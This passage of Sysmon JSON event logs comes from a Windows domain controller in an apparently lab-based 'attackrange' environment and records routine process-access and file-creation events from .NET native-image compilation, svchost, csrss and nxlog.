{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8467,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.888\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-001035370F00}\r\nTargetProcessId: 4064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.888","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-001035370F00}","TargetProcessId":"4064","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8468,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8469,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1360-5F25-0000-0010BD550E00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1360-5F25-0000-0010BD550E00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1377-5F25-0000-0010C23A0F00}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1377-5F25-0000-0010C23A0F00}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:15.998\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:15.998","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:16.357\r\nProcessGuid: {E2A3D6B1-1377-5F25-0000-0010C23A0F00}\r\nProcessId: 3836\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\efc-0\\System.Messaging.dll\r\nCreationUtcTime: 2020-08-01 07:02:16.357","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:16.357","ProcessGuid":"{E2A3D6B1-1377-5F25-0000-0010C23A0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\efc-0\\System.Messaging.dll","CreationUtcTime":"2020-08-01 07:02:16.357","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.404\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.404","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.404\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.404","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1371-5F25-0000-0010E6CF0E00}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.404\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1371-5F25-0000-0010E6CF0E00}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 